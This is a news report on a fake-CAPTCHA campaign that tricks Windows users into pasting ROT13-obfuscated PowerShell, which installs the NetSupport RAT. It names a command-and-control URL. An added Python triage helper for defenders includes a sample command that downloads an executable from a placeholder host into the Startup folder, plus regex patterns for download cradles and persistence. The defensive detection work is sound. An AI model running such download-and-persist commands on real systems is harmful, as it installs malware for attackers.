Cybersecurity analysts have uncovered a sophisticated malware campaign that abuses routine online verification steps to install malicious software on Windows systems globally.

Threat actors are leveraging fake “prove you are human” prompts to lure users into executing harmful PowerShell scripts. These scripts often appear on deceptive websites that imitate trusted platforms like GitHub repositories and DocuSign pages.

The operation tricks victims into copying code into their system’s Run prompt, initiating a multi-stage infection chain that leads to the installation of the NetSupport Remote Access Trojan (RAT).

Researchers at DomainTools report that attackers are using well-crafted social engineering tactics and themed websites to distribute the scripts. These pages are engineered to bypass conventional security tools through layered delivery techniques.

The infrastructure behind the campaign spans multiple domain registrars—Cloudflare, NameCheap, and NameSilo—and utilizes various name servers, making takedown efforts more difficult and ensuring redundancy for malware distribution.

A particularly stealthy technique used in this campaign involves clipboard poisoning. On fake DocuSign pages, users who click a CAPTCHA-like checkbox unknowingly trigger a script that silently copies an encoded payload to their clipboard. The copied payload, obfuscated with ROT13, decodes into a PowerShell command that downloads further malware, including “wbdims.exe” from GitHub, and ensures it runs at every login by placing it in the Startup folder.
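The clipboard-poisoning stage described above is a natural hunting target for defenders: whatever the victim pastes into the Run box is recorded in the RunMRU registry key. The following Python helper, an added example that is not part of the original report or of DomainTools' research, tries both the raw and ROT13-decoded form of a captured Run-box or clipboard value and flags combinations of PowerShell launch, download and Startup-folder indicators; the sample command and its URL are constructed placeholders, not indicators from the campaign.

```python
import codecs
import re

# Constructed sample: a ROT13-obfuscated launcher of the kind the article
# describes, as it might appear in a victim's clipboard or Run-box history.
# The URL is a placeholder, not a real indicator from the campaign.
SAMPLE_COMMAND = (
    'powershell -c "iwr http://example.invalid/wbdims.exe -OutFile '
    '$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wbdims.exe"'
)
SAMPLE_ROT13 = codecs.encode(SAMPLE_COMMAND, "rot13")

# Indicator families; two or more matching in one decoding is treated as suspicious.
INDICATORS = {
    "powershell_launch": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "startup_persistence": re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I),
}


def normalize_runmru(value):
    """Strip the trailing '\\1' suffix Windows appends to RunMRU registry values."""
    return value[:-2] if value.endswith("\\1") else value


def decodings(text):
    """Yield (label, candidate) for the raw text and its ROT13 decoding (ROT13 is self-inverse)."""
    yield "raw", text
    yield "rot13", codecs.decode(text, "rot13")


def triage(value):
    """Return {decoding_label: [indicator names]} for every decoding that matched something."""
    text = normalize_runmru(value)
    hits = {}
    for label, candidate in decodings(text):
        matched = [name for name, rx in INDICATORS.items() if rx.search(candidate)]
        if matched:
            hits[label] = matched
    return hits


def is_suspicious(value):
    """True when any single decoding trips at least two indicator families."""
    return any(len(names) >= 2 for names in triage(value).values())
```

A plain `powershell -c Get-Date` entry trips only one family and is not flagged, while the ROT13 sample is flagged only after decoding, which is the signal to look for.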

Infected machines also contact a command-and-control server at “docusign.sa.com/verification/c.php” to report successful infections and receive additional instructions.

The campaign’s strength lies in exploiting user trust in everyday internet interactions while deploying advanced technical methods to evade detection. By requiring user interaction, attackers cleverly shift part of the execution process onto the victim, making this one of the more sophisticated social engineering attacks seen in recent months.


News Source: CybersecurityNews.com